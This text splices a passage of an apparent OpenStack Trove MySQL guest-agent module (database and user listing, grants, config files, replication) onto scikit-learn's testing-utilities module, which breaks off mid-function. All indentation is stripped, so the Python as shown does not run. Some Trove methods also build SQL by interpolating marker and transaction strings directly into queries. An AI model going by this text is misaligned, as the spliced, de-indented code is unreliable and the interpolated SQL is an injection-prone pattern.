q.order = ['schema_name ASC']
if limit:
q.limit = limit + 1
if marker:
q.where.append("schema_name %s '%s'" %
(INCLUDE_MARKER_OPERATORS[include_marker],
marker))
t = text(str(q))
database_names = client.execute(t)
next_marker = None
LOG.debug("database_names = %r." % database_names)
for count, database in enumerate(database_names):
if count >= limit:
break
LOG.debug("database = %s." % str(database))
mysql_db = models.MySQLDatabase()
mysql_db.name = database[0]
next_marker = mysql_db.name
mysql_db.character_set = database[1]
mysql_db.collate = database[2]
databases.append(mysql_db.serialize())
LOG.debug("databases = " + str(databases))
if database_names.rowcount <= limit:
next_marker = None
return databases, next_marker
def list_users(self, limit=None, marker=None, include_marker=False):
"""List users that have access to the database."""
'''
SELECT
User,
Host,
Marker
FROM
(SELECT
User,
Host,
CONCAT(User, '@', Host) as Marker
FROM mysql.user
ORDER BY 1, 2) as innerquery
WHERE
Marker > :marker
ORDER BY
Marker
LIMIT :limit;
'''
LOG.debug("---Listing Users---")
users = []
with LocalSqlClient(get_engine()) as client:
mysql_user = models.MySQLUser()
iq = sql_query.Query() # Inner query.
iq.columns = ['User', 'Host', "CONCAT(User, '@', Host) as Marker"]
iq.tables = ['mysql.user']
iq.order = ['User', 'Host']
innerquery = str(iq).rstrip(';')
oq = sql_query.Query() # Outer query.
oq.columns = ['User', 'Host', 'Marker']
oq.tables = ['(%s) as innerquery' % innerquery]
oq.where = ["Host != 'localhost'"]
oq.order = ['Marker']
if marker:
oq.where.append("Marker %s '%s'" %
(INCLUDE_MARKER_OPERATORS[include_marker],
marker))
if limit:
oq.limit = limit + 1
t = text(str(oq))
result = client.execute(t)
next_marker = None
LOG.debug("result = " + str(result))
for count, row in enumerate(result):
if count >= limit:
break
LOG.debug("user = " + str(row))
mysql_user = models.MySQLUser()
mysql_user.name = row['User']
mysql_user.host = row['Host']
self._associate_dbs(mysql_user)
next_marker = row['Marker']
users.append(mysql_user.serialize())
if result.rowcount <= limit:
next_marker = None
LOG.debug("users = " + str(users))
return users, next_marker
def revoke_access(self, username, hostname, database):
"""Revoke a user's permission to use a given database."""
user = self._get_user(username, hostname)
with LocalSqlClient(get_engine()) as client:
r = sql_query.Revoke(database=database,
user=user.name,
host=user.host)
t = text(str(r))
client.execute(t)
def list_access(self, username, hostname):
"""Show all the databases to which the user has more than
USAGE granted.
"""
user = self._get_user(username, hostname)
return user.databases
class KeepAliveConnection(interfaces.PoolListener):
"""
A connection pool listener that ensures live connections are returned
from the connection pool at checkout. This alleviates the problem of
MySQL connections timing out.
"""
def checkout(self, dbapi_con, con_record, con_proxy):
"""Event triggered when a connection is checked out from the pool."""
try:
try:
dbapi_con.ping(False)
except TypeError:
dbapi_con.ping()
except dbapi_con.OperationalError as ex:
if ex.args[0] in (2006, 2013, 2014, 2045, 2055):
raise exc.DisconnectionError()
else:
raise
class MySqlApp(object):
"""Prepares DBaaS on a Guest container."""
TIME_OUT = 1000
def __init__(self, status):
"""By default login with root no password for initial setup."""
self.state_change_wait_time = CONF.state_change_wait_time
self.status = status
def _create_admin_user(self, client, password):
"""
Create a os_admin user with a random password
with all privileges similar to the root user.
"""
localhost = "localhost"
g = sql_query.Grant(permissions='ALL', user=ADMIN_USER_NAME,
host=localhost, grant_option=True, clear=password)
t = text(str(g))
client.execute(t)
@staticmethod
def _generate_root_password(client):
"""Generate and set a random root password and forget about it."""
localhost = "localhost"
uu = sql_query.UpdateUser("root", host=localhost,
clear=utils.generate_random_password())
t = text(str(uu))
client.execute(t)
def install_if_needed(self, packages):
"""Prepare the guest machine with a secure
mysql server installation.
"""
LOG.info(_("Preparing Guest as MySQL Server."))
if not packager.pkg_is_installed(packages):
LOG.debug("Installing MySQL server.")
self._clear_mysql_config()
# set blank password on pkg configuration stage
pkg_opts = {'root_password': '',
'root_password_again': ''}
packager.pkg_install(packages, pkg_opts, self.TIME_OUT)
self._create_mysql_confd_dir()
LOG.info(_("Finished installing MySQL server."))
self.start_mysql()
def complete_install_or_restart(self):
self.status.end_install_or_restart()
def secure(self, config_contents, overrides):
LOG.info(_("Generating admin password."))
admin_password = utils.generate_random_password()
clear_expired_password()
engine = sqlalchemy.create_engine("mysql://root:@localhost:3306",
echo=True)
with LocalSqlClient(engine) as client:
self._remove_anonymous_user(client)
self._create_admin_user(client, admin_password)
self.stop_db()
self._write_mycnf(admin_password, config_contents, overrides)
self.start_mysql()
LOG.debug("MySQL secure complete.")
def secure_root(self, secure_remote_root=True):
with LocalSqlClient(get_engine()) as client:
LOG.info(_("Preserving root access from restore."))
self._generate_root_password(client)
if secure_remote_root:
self._remove_remote_root_access(client)
def _clear_mysql_config(self):
"""Clear old configs, which can be incompatible with new version."""
LOG.debug("Clearing old MySQL config.")
random_uuid = str(uuid.uuid4())
configs = ["/etc/my.cnf", "/etc/mysql/conf.d", "/etc/mysql/my.cnf"]
for config in configs:
command = "mv %s %s_%s" % (config, config, random_uuid)
try:
utils.execute_with_timeout(command, shell=True,
root_helper="sudo")
LOG.debug("%s saved to %s_%s." %
(config, config, random_uuid))
except exception.ProcessExecutionError:
pass
def _create_mysql_confd_dir(self):
conf_dir = "/etc/mysql/conf.d"
LOG.debug("Creating %s." % conf_dir)
command = "sudo mkdir -p %s" % conf_dir
utils.execute_with_timeout(command, shell=True)
def _enable_mysql_on_boot(self):
LOG.debug("Enabling MySQL on boot.")
try:
mysql_service = operating_system.service_discovery(
MYSQL_SERVICE_CANDIDATES)
utils.execute_with_timeout(mysql_service['cmd_enable'], shell=True)
except KeyError:
LOG.exception(_("Error enabling MySQL start on boot."))
raise RuntimeError("Service is not discovered.")
def _disable_mysql_on_boot(self):
try:
mysql_service = operating_system.service_discovery(
MYSQL_SERVICE_CANDIDATES)
utils.execute_with_timeout(mysql_service['cmd_disable'],
shell=True)
except KeyError:
LOG.exception(_("Error disabling MySQL start on boot."))
raise RuntimeError("Service is not discovered.")
def stop_db(self, update_db=False, do_not_start_on_reboot=False):
LOG.info(_("Stopping MySQL."))
if do_not_start_on_reboot:
self._disable_mysql_on_boot()
try:
mysql_service = operating_system.service_discovery(
MYSQL_SERVICE_CANDIDATES)
utils.execute_with_timeout(mysql_service['cmd_stop'], shell=True)
except KeyError:
LOG.exception(_("Error stopping MySQL."))
raise RuntimeError("Service is not discovered.")
if not self.status.wait_for_real_status_to_change_to(
rd_instance.ServiceStatuses.SHUTDOWN,
self.state_change_wait_time, update_db):
LOG.error(_("Could not stop MySQL."))
self.status.end_install_or_restart()
raise RuntimeError("Could not stop MySQL!")
def _remove_anonymous_user(self, client):
t = text(sql_query.REMOVE_ANON)
client.execute(t)
def _remove_remote_root_access(self, client):
t = text(sql_query.REMOVE_ROOT)
client.execute(t)
def restart(self):
try:
self.status.begin_restart()
self.stop_db()
self.start_mysql()
finally:
self.status.end_install_or_restart()
def update_overrides(self, override_values):
"""
This function will update the MySQL overrides.cnf file
if there is content to write.
:param override_values:
:return:
"""
if override_values:
LOG.debug("Writing new overrides.cnf config file.")
self._write_config_overrides(override_values)
def apply_overrides(self, overrides):
LOG.debug("Applying overrides to MySQL.")
with LocalSqlClient(get_engine()) as client:
LOG.debug("Updating override values in running MySQL.")
for k, v in overrides.iteritems():
q = sql_query.SetServerVariable(key=k, value=v)
t = text(str(q))
try:
client.execute(t)
except exc.OperationalError:
output = {'key': k, 'value': v}
LOG.exception(_("Unable to set %(key)s with value "
"%(value)s.") % output)
def make_read_only(self, read_only):
with LocalSqlClient(get_engine()) as client:
q = "set global read_only = %s" % read_only
client.execute(text(str(q)))
def _write_temp_mycnf_with_admin_account(self, original_file_path,
temp_file_path, password):
mycnf_file = open(original_file_path, 'r')
tmp_file = open(temp_file_path, 'w')
for line in mycnf_file:
tmp_file.write(line)
if "[client]" in line:
tmp_file.write("user\t\t= %s\n" % ADMIN_USER_NAME)
tmp_file.write("password\t= %s\n" % password)
mycnf_file.close()
tmp_file.close()
def wipe_ib_logfiles(self):
"""Destroys the iblogfiles.
If for some reason the selected log size in the conf changes from the
current size of the files MySQL will fail to start, so we delete the
files to be safe.
"""
LOG.info(_("Wiping ib_logfiles."))
for index in range(2):
try:
# On restarts, sometimes these are wiped. So it can be a race
# to have MySQL start up before it's restarted and these have
# to be deleted. That's why its ok if they aren't found and
# that is why we use the "-f" option to "rm".
(utils.
execute_with_timeout("sudo", "rm", "-f", "%s/ib_logfile%d"
% (MYSQL_BASE_DIR, index)))
except exception.ProcessExecutionError:
LOG.exception("Could not delete logfile.")
raise
def _write_mycnf(self, admin_password, config_contents, overrides=None):
"""
Install the set of mysql my.cnf templates.
Update the os_admin user and password to the my.cnf
file for direct login from localhost.
"""
LOG.info(_("Writing my.cnf templates."))
if admin_password is None:
admin_password = get_auth_password()
try:
with open(TMP_MYCNF, 'w') as t:
t.write(config_contents)
utils.execute_with_timeout("sudo", "mv", TMP_MYCNF,
MYSQL_CONFIG)
self._write_temp_mycnf_with_admin_account(MYSQL_CONFIG,
TMP_MYCNF,
admin_password)
utils.execute_with_timeout("sudo", "mv", TMP_MYCNF,
MYSQL_CONFIG)
except Exception:
os.unlink(TMP_MYCNF)
raise
self.wipe_ib_logfiles()
# write configuration file overrides
if overrides:
self._write_config_overrides(overrides)
def _write_config_overrides(self, overrideValues):
LOG.info(_("Writing new temp overrides.cnf file."))
with open(MYCNF_OVERRIDES_TMP, 'w') as overrides:
overrides.write(overrideValues)
LOG.info(_("Moving overrides.cnf into correct location."))
utils.execute_with_timeout("sudo", "mv", MYCNF_OVERRIDES_TMP,
MYCNF_OVERRIDES)
LOG.info(_("Setting permissions on overrides.cnf."))
utils.execute_with_timeout("sudo", "chmod", "0644",
MYCNF_OVERRIDES)
def remove_overrides(self):
LOG.info(_("Removing overrides configuration file."))
if os.path.exists(MYCNF_OVERRIDES):
utils.execute_with_timeout("sudo", "rm", MYCNF_OVERRIDES)
def _write_replication_overrides(self, overrideValues, cnf_file):
LOG.info(_("Writing replication.cnf file."))
with open(MYCNF_REPLCONFIG_TMP, 'w') as overrides:
overrides.write(overrideValues)
LOG.debug("Moving temp replication.cnf into correct location.")
utils.execute_with_timeout("sudo", "mv", MYCNF_REPLCONFIG_TMP,
cnf_file)
LOG.debug("Setting permissions on replication.cnf.")
utils.execute_with_timeout("sudo", "chmod", "0644", cnf_file)
def _remove_replication_overrides(self, cnf_file):
LOG.info(_("Removing replication configuration file."))
if os.path.exists(cnf_file):
utils.execute_with_timeout("sudo", "rm", cnf_file)
def exists_replication_source_overrides(self):
return os.path.exists(MYCNF_REPLMASTER)
def write_replication_source_overrides(self, overrideValues):
self._write_replication_overrides(overrideValues, MYCNF_REPLMASTER)
def write_replication_replica_overrides(self, overrideValues):
self._write_replication_overrides(overrideValues, MYCNF_REPLSLAVE)
def remove_replication_source_overrides(self):
self._remove_replication_overrides(MYCNF_REPLMASTER)
def remove_replication_replica_overrides(self):
self._remove_replication_overrides(MYCNF_REPLSLAVE)
def grant_replication_privilege(self, replication_user):
LOG.info(_("Granting Replication Slave privilege."))
LOG.debug("grant_replication_privilege: %s" % replication_user)
with LocalSqlClient(get_engine()) as client:
g = sql_query.Grant(permissions=['REPLICATION SLAVE'],
user=replication_user['name'],
clear=replication_user['password'])
t = text(str(g))
client.execute(t)
def get_port(self):
with LocalSqlClient(get_engine()) as client:
result = client.execute('SELECT @@port').first()
return result[0]
def get_binlog_position(self):
with LocalSqlClient(get_engine()) as client:
result = client.execute('SHOW MASTER STATUS').first()
binlog_position = {
'log_file': result['File'],
'position': result['Position']
}
return binlog_position
def execute_on_client(self, sql_statement):
LOG.debug("Executing SQL: %s" % sql_statement)
with LocalSqlClient(get_engine()) as client:
return client.execute(sql_statement)
def start_slave(self):
LOG.info(_("Starting slave replication."))
with LocalSqlClient(get_engine()) as client:
client.execute('START SLAVE')
self._wait_for_slave_status("ON", client, 60)
def stop_slave(self, for_failover):
replication_user = None
LOG.info(_("Stopping slave replication."))
with LocalSqlClient(get_engine()) as client:
result = client.execute('SHOW SLAVE STATUS')
replication_user = result.first()['Master_User']
client.execute('STOP SLAVE')
client.execute('RESET SLAVE ALL')
self._wait_for_slave_status("OFF", client, 30)
if not for_failover:
client.execute('DROP USER ' + replication_user)
return {
'replication_user': replication_user
}
def stop_master(self):
LOG.info(_("Stopping replication master."))
with LocalSqlClient(get_engine()) as client:
client.execute('RESET MASTER')
def _wait_for_slave_status(self, status, client, max_time):
def verify_slave_status():
actual_status = client.execute(
"SHOW GLOBAL STATUS like 'slave_running'").first()[1]
return actual_status.upper() == status.upper()
LOG.debug("Waiting for SLAVE_RUNNING to change to %s.", status)
try:
utils.poll_until(verify_slave_status, sleep_time=3,
time_out=max_time)
LOG.info(_("Replication is now %s.") % status.lower())
except PollTimeOut:
raise RuntimeError(
_("Replication is not %(status)s after %(max)d seconds.") % {
'status': status.lower(), 'max': max_time})
def start_mysql(self, update_db=False):
LOG.info(_("Starting MySQL."))
# This is the site of all the trouble in the restart tests.
# Essentially what happens is that mysql start fails, but does not
# die. It is then impossible to kill the original, so
self._enable_mysql_on_boot()
try:
mysql_service = operating_system.service_discovery(
MYSQL_SERVICE_CANDIDATES)
utils.execute_with_timeout(mysql_service['cmd_start'], shell=True)
except KeyError:
raise RuntimeError("Service is not discovered.")
except exception.ProcessExecutionError:
# it seems mysql (percona, at least) might come back with [Fail]
# but actually come up ok. we're looking into the timing issue on
# parallel, but for now, we'd like to give it one more chance to
# come up. so regardless of the execute_with_timeout() response,
# we'll assume mysql comes up and check it's status for a while.
pass
if not self.status.wait_for_real_status_to_change_to(
rd_instance.ServiceStatuses.RUNNING,
self.state_change_wait_time, update_db):
LOG.error(_("Start up of MySQL failed."))
# If it won't start, but won't die either, kill it by hand so we
# don't let a rouge process wander around.
try:
utils.execute_with_timeout("sudo", "pkill", "-9", "mysql")
except exception.ProcessExecutionError:
LOG.exception(_("Error killing stalled MySQL start command."))
# There's nothing more we can do...
self.status.end_install_or_restart()
raise RuntimeError("Could not start MySQL!")
def start_db_with_conf_changes(self, config_contents):
LOG.info(_("Starting MySQL with conf changes."))
LOG.debug("Inside the guest - Status is_running = (%s)."
% self.status.is_running)
if self.status.is_running:
LOG.error(_("Cannot execute start_db_with_conf_changes because "
"MySQL state == %s.") % self.status)
raise RuntimeError("MySQL not stopped.")
LOG.info(_("Resetting configuration."))
self._write_mycnf(None, config_contents)
self.start_mysql(True)
def reset_configuration(self, configuration):
config_contents = configuration['config_contents']
LOG.info(_("Resetting configuration."))
self._write_mycnf(None, config_contents)
# DEPRECATED: Mantain for API Compatibility
def get_txn_count(self):
LOG.info(_("Retrieving latest txn id."))
txn_count = 0
with LocalSqlClient(get_engine()) as client:
result = client.execute('SELECT @@global.gtid_executed').first()
for uuid_set in result[0].split(','):
for interval in uuid_set.split(':')[1:]:
if '-' in interval:
iparts = interval.split('-')
txn_count += int(iparts[1]) - int(iparts[0])
else:
txn_count += 1
return txn_count
def _get_slave_status(self):
with LocalSqlClient(get_engine()) as client:
return client.execute('SHOW SLAVE STATUS').first()
def _get_master_UUID(self):
slave_status = self._get_slave_status()
return slave_status and slave_status['Master_UUID'] or None
def _get_gtid_executed(self):
with LocalSqlClient(get_engine()) as client:
return client.execute('SELECT @@global.gtid_executed').first()[0]
def get_last_txn(self):
master_UUID = self._get_master_UUID()
last_txn_id = '0'
gtid_executed = self._get_gtid_executed()
for gtid_set in gtid_executed.split(','):
uuid_set = gtid_set.split(':')
if uuid_set[0] == master_UUID:
last_txn_id = uuid_set[-1].split('-')[-1]
break
return master_UUID, int(last_txn_id)
def get_latest_txn_id(self):
LOG.info(_("Retrieving latest txn id."))
return self._get_gtid_executed()
def wait_for_txn(self, txn):
LOG.info(_("Waiting on txn '%s'.") % txn)
with LocalSqlClient(get_engine()) as client:
client.execute("SELECT WAIT_UNTIL_SQL_THREAD_AFTER_GTIDS('%s')"
% txn)
class MySqlRootAccess(object):
@classmethod
def is_root_enabled(cls):
"""Return True if root access is enabled; False otherwise."""
with LocalSqlClient(get_engine()) as client:
t = text(sql_query.ROOT_ENABLED)
result = client.execute(t)
LOG.debug("Found %s with remote root access." % result.rowcount)
return result.rowcount != 0
@classmethod
def enable_root(cls, root_password=None):
"""Enable the root user global access and/or
reset the root password.
"""
user = models.RootUser()
user.name = "root"
user.host = "%"
user.password = root_password or utils.generate_random_password()
with LocalSqlClient(get_engine()) as client:
print(client)
try:
cu = sql_query.CreateUser(user.name, host=user.host)
t = text(str(cu))
client.execute(t, **cu.keyArgs)
except exc.OperationalError as err:
# Ignore, user is already created, just reset the password
# TODO(rnirmal): More fine grained error checking later on
LOG.debug(err)
with LocalSqlClient(get_engine()) as client:
print(client)
uu = sql_query.UpdateUser(user.name, host=user.host,
clear=user.password)
t = text(str(uu))
client.execute(t)
LOG.debug("CONF.root_grant: %s CONF.root_grant_option: %s." %
(CONF.root_grant, CONF.root_grant_option))
g = sql_query.Grant(permissions=CONF.root_grant,
user=user.name,
host=user.host,
grant_option=CONF.root_grant_option,
clear=user.password)
t = text(str(g))
client.execute(t)
return user.serialize()
| |
"""Testing utilities."""
# Copyright (c) 2011, 2012
# Authors: Pietro Berkes,
# Andreas Muller
# Mathieu Blondel
# Olivier Grisel
# Arnaud Joly
# Denis Engemann
# Giorgio Patrini
# Thierry Guillemot
# License: BSD 3 clause
import os
import os.path as op
import inspect
import warnings
import sys
import functools
import tempfile
from subprocess import check_output, STDOUT, CalledProcessError
from subprocess import TimeoutExpired
import scipy as sp
from functools import wraps
from inspect import signature
import shutil
import atexit
import unittest
from unittest import TestCase
# WindowsError only exist on Windows
try:
WindowsError
except NameError:
WindowsError = None
from numpy.testing import assert_allclose
from numpy.testing import assert_almost_equal
from numpy.testing import assert_approx_equal
from numpy.testing import assert_array_equal
from numpy.testing import assert_array_almost_equal
from numpy.testing import assert_array_less
import numpy as np
import joblib
import sklearn
from sklearn.utils import IS_PYPY, _IS_32BIT
__all__ = ["assert_raises",
"assert_raises_regexp",
"assert_array_equal",
"assert_almost_equal",
"assert_array_almost_equal", "assert_array_less",
"assert_approx_equal", "assert_allclose",
"assert_run_python_script", "SkipTest"]
_dummy = TestCase('__init__')
assert_raises = _dummy.assertRaises
SkipTest = unittest.case.SkipTest
assert_dict_equal = _dummy.assertDictEqual
assert_raises_regex = _dummy.assertRaisesRegex
# assert_raises_regexp is deprecated in Python 3.4 in favor of
# assert_raises_regex but lets keep the backward compat in scikit-learn with
# the old name for now
assert_raises_regexp = assert_raises_regex
def assert_warns(warning_class, func, *args, **kw):
"""Test that a certain warning occurs.
Parameters
----------
warning_class : the warning class
The class to test for, e.g. UserWarning.
func : callable
Callable object to trigger warnings.
*args : the positional arguments to `func`.
**kw : the keyword arguments to `func`
Returns
-------
result : the return value of `func`
"""
with warnings.catch_warnings(record=True) as w:
# Cause all warnings to always be triggered.
warnings.simplefilter("always")
# Trigger a warning.
result = func(*args, **kw)
if hasattr(np, 'FutureWarning'):
# Filter out numpy-specific warnings in numpy >= 1.9
w = [e for e in w
if e.category is not np.VisibleDeprecationWarning]
# Verify some things
if not len(w) > 0:
raise AssertionError("No warning raised when calling %s"
% func.__name__)
found = any(warning.category is warning_class for warning in w)
if not found:
raise AssertionError("%s did not give warning: %s( is %s)"
% (func.__name__, warning_class, w))
return result
def assert_warns_message(warning_class, message, func, *args, **kw):
# very important to avoid uncontrolled state propagation
"""Test that a certain warning occurs and with a certain message.
Parameters
----------
warning_class : the warning class
The class to test for, e.g. UserWarning.
message : str | callable
The message or a substring of the message to test for. If callable,
it takes a string as the argument and will trigger an AssertionError
if the callable returns `False`.
func : callable
Callable object to trigger warnings.
*args : the positional arguments to `func`.
**kw : the keyword arguments to `func`.
Returns
-------
result : the return value of `func`
"""
with warnings.catch_warnings(record=True) as w:
# Cause all warnings to always be triggered.
warnings.simplefilter("always")
if hasattr(np, 'FutureWarning'):
# Let's not catch the numpy internal DeprecationWarnings
warnings.simplefilter('ignore', np.VisibleDeprecationWarning)
# Trigger a warning.
result = func(*args, **kw)
# Verify some things
if not len(w) > 0:
raise AssertionError("No warning raised when calling %s"
% func.__name__)
found = [issubclass(warning.category, warning_class) for warning in w]
if not any(found):
raise AssertionError("No warning raised for %s with class "
"%s"
% (func.__name__, warning_class))
message_found = False
# Checks the message of all warnings belong to warning_class
for index in [i for i, x in enumerate(found) if x]:
# substring will match, the entire message with typo won't
msg = w[index].message # For Python 3 compatibility
msg = str(msg.args[0] if hasattr(msg, 'args') else msg)
if callable(message): # add support for certain tests
check_in_message = message
else:
def check_in_message(msg): return message in msg
if check_in_message(msg):
message_found = True
break
if not message_found:
raise AssertionError("Did not receive the message you expected "
"('%s') for <%s>, got: '%s'"
% (message, func.__name__, msg))
return result
def assert_warns_div0(func, *args, **kw):
"""Assume that numpy's warning for divide by zero is raised
Handles the case of platforms that do not support warning on divide by zero
Parameters
----------
func
*args
**kw
"""
with np.errstate(divide='warn', invalid='warn'):
try:
assert_warns(RuntimeWarning, np.divide, 1, np.zeros(1))
except AssertionError:
# This platform does not report numpy divide by zeros
return func(*args, **kw)
return assert_warns_message(RuntimeWarning,
'invalid value encountered',
func, *args, **kw)
# To remove when we support numpy 1.7
def assert_no_warnings(func, *args, **kw):
"""
Parameters
----------
func
*args
**kw
"""
# very important to avoid uncontrolled state propagation
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
result = func(*args, **kw)
if hasattr(np, 'FutureWarning'):
# Filter out numpy-specific warnings in numpy >= 1.9
w = [e for e in w
if e.category is not np.VisibleDeprecationWarning]
if len(w) > 0:
raise AssertionError("Got warnings when calling %s: [%s]"
% (func.__name__,
', '.join(str(warning) for warning in w)))
return result
def ignore_warnings(obj=None, category=Warning):
"""Context manager and decorator to ignore warnings.
Note: Using this (in both variants) will clear all warnings
from all python modules loaded. In case you need to test
cross-module-warning-logging, this is not your tool of choice.
Parameters
----------
obj : callable or None
callable where you want to ignore the warnings.
category : warning class, defaults to Warning.
The category to filter. If Warning, all categories will be muted.
Examples
--------
>>> with ignore_warnings():
... warnings.warn('buhuhuhu')
>>> def nasty_warn():
... warnings.warn('buhuhuhu')
... print(42)
>>> ignore_warnings(nasty_warn)()
42
"""
if isinstance(obj, type) and issubclass(obj, Warning):
# Avoid common pitfall of passing category as the first positional
# argument which result in the test not being run
warning_name = obj.__name__
raise ValueError(
"'obj' should be a callable where you want to ignore warnings. "
"You passed a warning class instead: 'obj={warning_name}'. "
"If you want to pass a warning class to ignore_warnings, "
"you should use 'category={warning_name}'".format(
warning_name=warning_name))
elif callable(obj):
return _IgnoreWarnings(category=category)(obj)
else:
return _IgnoreWarnings(category=category)
class _IgnoreWarnings:
"""Improved and simplified Python warnings context manager and decorator.
This class allows the user to ignore the warnings raised by a function.
Copied from Python 2.7.5 and modified as required.
Parameters
----------
category : tuple of warning class, default to Warning
The category to filter. By default, all the categories will be muted.
"""
def __init__(self, category):
self._record = True
self._module = sys.modules['warnings']
self._entered = False
self.log = []
self.category = category
def __call__(self, fn):
"""Decorator to catch and hide warnings without visual nesting."""
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore", self.category)
return fn(*args, **kwargs)
return wrapper
def __repr__(self):
args = []
if self._record:
args.append("record=True")
if self._module is not sys.modules['warnings']:
args.append("module=%r" % self._module)
name = type(self).__name__
return "%s(%s)" % (name, ", ".join(args))
def __enter__(self):
if self._entered:
raise RuntimeError("Cannot enter %r twice" % self)
self._entered = True
self._filters = self._module.filters
self._module.filters = self._filters[:]
self._showwarning = self._module.showwarning
warnings.simplefilter("ignore", self.category)
def __exit__(self, *exc_info):
if not self._entered:
raise RuntimeError("Cannot exit %r without entering first" % self)
self._module.filters = self._filters
self._module.showwarning = self._showwarning
self.log[:] = []
def assert_raise_message(exceptions, message, function, *args, **kwargs):
"""Helper function to test the message raised in an exception.
Given an exception, a callable to raise the exception, and
a message string, tests that the correct exception is raised and
that the message is a substring of the error thrown. Used to test
that the specific message thrown during an exception is correct.
Parameters
----------
exceptions : exception or tuple of exception
An Exception object.
message : str
The error message or a substring of the error message.
function : callable
Callable object to raise error.
*args : the positional arguments to `function`.
**kwargs : the keyword arguments to `function`.
"""
try:
function(*args, **kwargs)
except exceptions as e:
error_message = str(e)
if message not in error_message:
raise AssertionError("Error message does not include the expected"
" string: %r. Observed error message: %r" %
(message, error_message))
else:
# concatenate exception names
if isinstance(exceptions, tuple):
names = " or ".join(e.__name__ for e in exceptions)
else:
names = exceptions.__name__
raise AssertionError("%s not raised by %s" %
(names, function.__name__))
def assert_allclose_dense_sparse(x, y, rtol=1e-07, atol=1e-9, err_msg=''):
"""Assert allclose for sparse and dense data.
Both x and y need to be either sparse or dense, they
can't be mixed.
Parameters
----------
x : array-like or sparse matrix
First array to compare.
y : array-like or sparse matrix
Second array to compare.
rtol : float, optional
relative tolerance; see numpy.allclose
atol : float, optional
absolute tolerance; see numpy.allclose. Note that the default here is
more tolerant than the default for numpy.testing.assert_allclose, where
atol=0.
err_msg : string, default=''
Error message to raise.
"""
if sp.sparse.issparse(x) and sp.sparse.issparse(y):
x = x.tocsr()
y = y.tocsr()
x.sum_duplicates()
y.sum_duplicates()
assert_array_equal(x.indices, y.indices, err_msg=err_msg)
assert_array_equal(x.indptr, y.indptr, err_msg=err_msg)
assert_allclose(x.data, y.data, rtol=rtol, atol=atol, err_msg=err_msg)
elif not sp.sparse.issparse(x) and not sp.sparse.issparse(y):
# both dense
assert_allclose(x, y, rtol=rtol, atol=atol, err_msg=err_msg)
else:
raise ValueError("Can only compare two sparse matrices,"
" not a sparse matrix and an array.")
def set_random_state(estimator, random_state=0):
"""Set random state of an estimator if it has the `random_state` param.
Parameters
----------
estimator : object
The estimator
random_state : int, RandomState instance or None, optional, default=0
Pseudo random number generator state.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
"""
if "random_state" in estimator.get_params():
estimator.set_params(random_state=random_state)
try:
import pytest
skip_if_32bit = pytest.mark.skipif(_IS_32BIT,
reason='skipped on 32bit platforms')
skip_travis = pytest.mark.skipif(os.environ.get('TRAVIS') == 'true',
reason='skip on travis')
fails_if_pypy = pytest.mark.xfail(IS_PYPY,
reason='not compatible with PyPy')
skip_if_no_parallel = pytest.mark.skipif(not joblib.parallel.mp,
reason="joblib is in serial mode")
# Decorator for tests involving both BLAS calls and multiprocessing.
#
# Under POSIX (e.g. Linux or OSX), using multiprocessing in conjunction
# with some implementation of BLAS (or other libraries that manage an
# internal posix thread pool) can cause a crash or a freeze of the Python
# process.
#
# In practice all known packaged distributions (from Linux distros or
# Anaconda) of BLAS under Linux seems to be safe. So we this problem seems
# to only impact OSX users.
#
# This wrapper makes it possible to skip tests that can possibly cause
# this crash under OS X with.
#
# Under Python 3.4+ it is possible to use the `forkserver` start method
# for multiprocessing to avoid this issue. However it can cause pickling
# errors on interactively defined functions. It therefore not enabled by
# default.
if_safe_multiprocessing_with_blas = pytest.mark.skipif(
sys.platform == 'darwin',
reason="Possible multi-process bug with some BLAS")
except ImportError:
pass
def check_skip_network():
if int(os.environ.get('SKLEARN_SKIP_NETWORK_TESTS', 0)):
raise SkipTest("Text tutorial requires large dataset download")
def _delete_folder(folder_path, warn=False):
"""Utility function to cleanup a temporary folder if still existing.
Copy from joblib.pool (for independence).
"""
try:
if os.path.exists(folder_path):
# This can fail under windows,
# but will succeed when called by atexit
shutil.rmtree(folder_path)
except WindowsError:
if warn:
warnings.warn("Could not delete temporary folder %s" % folder_path)
class TempMemmap:
"""
Parameters
----------
data
mmap_mode
"""
def __init__(self, data, mmap_mode='r'):
self.mmap_mode = mmap_mode
self.data = data
def __enter__(self):
data_read_only, self.temp_folder = create_memmap_backed_data(
self.data, mmap_mode=self.mmap_mode, return_folder=True)
return data_read_only
def __exit__(self, exc_type, exc_val, exc_tb):
_delete_folder(self.temp_folder)
def create_memmap_backed_data(data, mmap_mode='r', return_folder=False):
"""
Parameters
----------
data
mmap_mode
return_folder
"""
temp_folder = tempfile.mkdtemp(prefix='sklearn_testing_')
atexit.register(functools.partial(_delete_folder, temp_folder, warn=True))
filename = op.join(temp_folder, 'data.pkl')
joblib.dump(data, filename)
memmap_backed_data = joblib.load(filename, mmap_mode=mmap_mode)
result = (memmap_backed_data if not return_folder
else (memmap_backed_data, temp_folder))
return result
# Utils to test docstrings
def _get_args(function, varargs=False):
"""Helper to get function arguments"""
try:
params = signature(function).parameters
except ValueError:
# Error on builtin C function
return []
args = [key for key, param in params.items()
if param.kind not in (param.VAR_POSITIONAL, param.VAR_KEYWORD)]
if varargs:
varargs = [param.name for param in params.values()
if param.kind == param.VAR_POSITIONAL]
if len(varargs) == 0:
varargs = None
return args, varargs
else:
return args
def _get_func_name(func):
"""Get function full name
Parameters
----------
func : callable
The function object.
Returns
-------
name : str
The function name.
"""
parts = []
module = inspect.getmodule(func)
if module:
parts.append(module.__name__)
qualname = func.__qualname__
if qualname != func.__name__:
parts.append(qualname[:qualname.find('.')])
parts.append(func.__name__)
return '.'.join(parts)
def check_docstring_parameters(func, doc=None, ignore=None):
"""Helper to check docstring
Parameters
----------
func : callable
The function object to test.
doc : str, optional (default: None)
Docstring if it is passed manually to the test.
ignore : None | list
Parameters to ignore.
Returns
-------
incorrect : list
A list of string describing the incorrect results.
"""
from numpydoc import docscrape
incorrect = []
ignore = [] if ignore is None else ignore
func_name = _get_func_name(func)
if (not func_name.startswith('sklearn.') or
func_name.startswith('sklearn.externals')):
return incorrect
# Don't check docstring for property-functions
if inspect.isdatadescriptor(func):
return incorrect
# Don't check docstring for setup / teardown pytest functions
if func_name.split('.')[-1] in ('setup_module', 'teardown_module'):
return incorrect
# Dont check estimator_checks module
if func_name.split('.')[2] == 'estimator_checks':
return incorrect
# Get the arguments from the function signature
